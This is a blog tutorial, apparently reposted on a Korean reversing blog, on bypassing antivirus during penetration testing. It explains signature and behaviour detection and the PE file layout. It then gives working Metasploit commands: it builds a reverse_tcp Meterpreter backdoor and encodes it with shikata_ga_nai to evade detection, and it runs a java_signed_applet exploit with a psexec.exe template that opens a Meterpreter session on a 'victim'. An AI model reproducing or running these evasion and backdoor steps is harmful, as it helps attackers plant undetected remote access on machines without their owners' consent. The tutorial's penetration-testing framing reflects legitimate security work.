<출처:
>
How do you bypass an antivirus? This is not a new question; everyone who are belongs to ethical hacking and penetration testing groups discuss this issue often. Even new users (script kiddies) are anxious to learn ways to overcome their keyloggers, stealer’s and RAT (remote administrator tools). Clearly, there is a pressing and widespread need by everyone need to bypass an anti-virus, even while in the process of penetration testing and ethical hacking anti-viruses in attempts to create a robust defense for an operating system. Let’s consider a simple example: suppose a company hired you to conduct a vulnerability assessment on their network. They give you a black box test but you aren’t equipped with much information about the network. If they are using an end-to-end anti-virus solution for their network, whenever you launch a test, the anti-virus system in place will defend it. So the first obstacle you’ll need to overcome is bypassing the anti-virus. It is very easy to discuss a tool that can hide any file from the eye of anti-virus systems, but it is probably more effective to understand the story behind the tools or techniques in order to best implement them. In this article we will cover :
- How Anti-virus works
- What are the ways (techniques) to bypass an Anti-virus
- Metasploit tutorial to bypass an anti-virus
How Anti-virus Works
It is very important to discuss the working mechanism and phenomena of anti-viruses, because if you don’t know how an anti-virus works or how an anti-virus system detects viruses, you will limit your ability to effectively cheat or bypass an anti-virus. There are many companies that create their anti-virus in their own way, but they each share two main approaches to detecting a virus:
- Signature based detection
- Suspicious Behavior
Signature based detection is the most common and widely used technique. In it, an anti-virus system compares the content of the file to its database. Signature based detection – while a fast and effective technique – is limited in that it can only detect known viruses. The other technique is based on monitoring suspicious activities and behavior. With this technique, an anti-virus continuously observes (in real time) the behavior of a file. If any file overwrites itself and steals data without user permission, than this file treat as a virus.
Example:
Here’s an example to best understand the working mechanism of an anti-virus: let’s say you have installed an anti-virus on your computer. When you plug-in your flash drive (USB), there are two options:
- Anti-virus will automatically detect viruses (based suspicious activities)
- You will launch a scan against your USB and then the anti-virus finds some virus (Signature based detection)
This is how an anti-virus works; now we need to discuss the file format. PE, or portable executive, is the default file format for windows binary. Most of the viruses and malware hide in the PE file. So what is the structure of portable executive file and how does an anti-virus read the signature?
------------------
| DOS-stub |
+-------------------+
|PE file-header |
+-------------------+
| optional header |
|- - - - - - - - - -|
| |
| data directories |
| |
+-------------------+
| |
| Image pages |
| |
+-------------------+
| |
| section tables |
| |
+-------------------+
| |
| section 1 |
| |
+----------------+
| |
| ... |
| |
+-------------------+
| |
| section n |
| |
+-------------------+
This is the typical structure of the portable executive file. Each section can be divided into multiple sub-sections, but in this article we’ll discuss this with respect to the anti-virus detection methodology. PE (portable executive) file header is the most important section, containing:
- Signature bytes
- Time and date stamp
- Image base and image size
- Stack reverse size
- Debug table
- Fixup table
- Security table
- and more
So the PE file header is the one that contains the signature and other important values of any executable file. In the signature file, the first number usually represents a microprocessor type. The typical microprocessor types are 16-bit, 32-bit and 64-bit. For example, the 80386 processor has a value of 0x14c.
Let’s take an example of a typical netcat backdoor listener, which bind cmd on port number 99 for connecting to the server. By doing a little analysis, we can see that the signature is located on offset E77E.
Now just imagine the importance of the signature in any portable executive file. There are different tools available to find it. If you want to bypass an anti-virus, then you’ll need to modify this signature so that the anti-virus treats it as a normal file.
Below is the list of some utilities that are based on netcat and have the ability to bypass anti-viruses.
- Cryptcat Project: This is an advanced utility based on netcat and one that uses an encryption technique with the ports of Windows, BSD and Linux.
- MOCAT backdoor: This one is based on the cryptcat project and works on client and server phenomena, meaning it has two executables: one for windows and the other for Linux. All communications of MOCAT are encrypted.
- Ncat : Ncat is a wonderful tool that has been designed by the nmap community. It works on both TCP and UDP ports and on Ipv4 as well as Ipv6.
Bypass an Anti-virus – Metasploit Tutorial
The first part of our discussion focused on the importance of encoding to bypass an anti-virus. Metasploit is wonderful tool with many encoders to bypass the anti-viruses. Some of the encoders are based on polymorphic code (polymorphic virus). Polymorphic code changes the signature everytime it infects a new file. Shikata_ga_nai seems to be the best encoder to encode a virus so that your file easily bypass most of the anti-viruses. According to a wonderful blog post published on secmaniac, the best combinations to bypass almost 85 % of the anti-viruses are:
- Shikata encoding 5 times
- Alpha_Upper encoding 2 times
- Shikata encoding 5 times
- Countdown encoding 5 times
Within the social engineering toolkit encoder list, shikata_ga_nai is a particularly good encoder. Take a look at the picture below:
You can find a list of available encoders on metasploit. Please follow the commands below:
root@bt:~# msfencode -h
Usage: /opt/framework/msf3/msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-d Specify the directory in which to look for EXE templates
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
-v Increase verbosity
-x Specify an alternate executable template
---------------------------------------------------------------------------------------------------------------------------
root@bt:~# msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
Example without Encoder
The first demonstration was done without using any encoder. On the second, I will use the best encoder, after which we’ll compare the results of both. Here is the simple backdoor generation step:
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > Desktop/meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
root@bt:~#
You can see that the most common and famous anti-viruses have detected some malware in a file. It is therefore not a good practice to send this file to the victim, since an anti-virus can easily detect it.
Example with Encoder
In this example I will use an encoder so that the backdoor will easily be able to bypass anti-viruses. Here’s how to begin:
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X | msfencode -c 1 -e x86/shikata_ga_nai > Desktop/meterpreter_1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
[*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1)
root@bt:~#
Now you can easily see the difference between these two results.
Bypass An Anti-virus during Exploitation
Now consider the other side of the picture: that automatic exploits face some problems when, though an operating system is vulnerable and you are able to take control of it, but an anti-virus is enabled and can then offend it. Here’s another example :
msf > use exploit/multi/browser/java_signed_applet msf exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(java_signed_applet) > set LHOST 192.168.1.12 LHOST => 192.168.1.12 msf exploit(java_signed_applet) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.12:4444 [*] Using URL: http://0.0.0.0:8080/bOX4eN [*] Local IP: http://192.168.1.12:8080/bOX4eN [*] Server started. msf exploit(java_signed_applet) > [*] Handling request from 192.168.1.12:39663... [*] Sending SiteLoader.jar to 192.168.1.12. Waiting for user to click 'accept'... [*] Sending SiteLoader.jar to 192.168.1.12. Waiting for user to click 'accept'... [*] Generated executable to drop (37888 bytes). [*] Compiling applet classes... [*] Compile completed. Building jar file... [*] Jar built. Signing... [*] Jar signed. Ready to send.
The victim’s computer is Windows and has an enabled anti-virus AVG, but it has not given any session. Though the victim is vulnerable, the attack will fail due to the anti-virus. Now I will change the scenario slightly: metasploit uses a default template.exe for executive generation, and to bypass an anti-virus, we need to use a custom windows executive.
What about telnet? What other ports are available for remote desktop connection? Pstools is a wonderful resources toolkit with an entirely different command line: tools for administrative purposes. PsExec is among these tools. It is a utility that allows you to execute programs on remote system:
msf exploit(java_signed_applet) > set Template /tmp/pstools/psexec.exe Template => /tmp/pstools/psexec.exe msf exploit(java_signed_applet) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.12:4444 [*] Using URL: http://0.0.0.0:8080/bOX4eN [*] Local IP: http://192.168.1.12:8080/bOX4eN [*] Server started. msf exploit(java_signed_applet) > [*] Handling request from 192.168.1.12:39663... [*] Sending SiteLoader.jar to 192.168.1.12. Waiting for user to click 'accept'... [*] Sending SiteLoader.jar to 192.168.1.12. Waiting for user to click 'accept'... [*] Generated executable to drop (37888 bytes). [*] Compiling applet classes... [*] Compile completed. Building jar file... [*] Jar built. Signing... [*] Jar signed. Ready to send. [*] Sending stage (748032 bytes) to 192.168.1.8 [*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.8:5807) msf exploit(java_signed_applet) > sessions -i 1 [*] Starting interaction with 1...
This example shows that encoding is not only a single way to bypass anti-viruses, but that you can easily fool anti-virus because of legitimate files.
Conclusion
There are some wonderful tutorials and techniques available to bypass the anti-virus. Among them are some crypter, wrapper and other tools readily found on the internet for the public, but downloading these files from unknown source is not recommended. Some people use these techniques to take advantage of the innocent, so when you download and install such a file, keep in mind that there is a chance that your computer will be at risk for some sort of malware and backdoor(s) attack.
Last but not least, never trust any unknown source. Otherwise, you can become the next victim, whether you have an anti-virus or not – now that you have seen how easy is to bypass them.
'리버싱' 카테고리의 다른 글
| Anti-Reversing Techniques (0) | 2011.12.15 |
|---|---|
| From ROP to JOP (0) | 2011.12.15 |
| detail-analysis-advanced-persistent-threat-malware_33814.pdf (0) | 2011.10.28 |
| PEB 구조체를 이용한 간단한 안티디버깅 코드 (0) | 2011.10.07 |
| unpack_dragonarmour (0) | 2011.09.06 |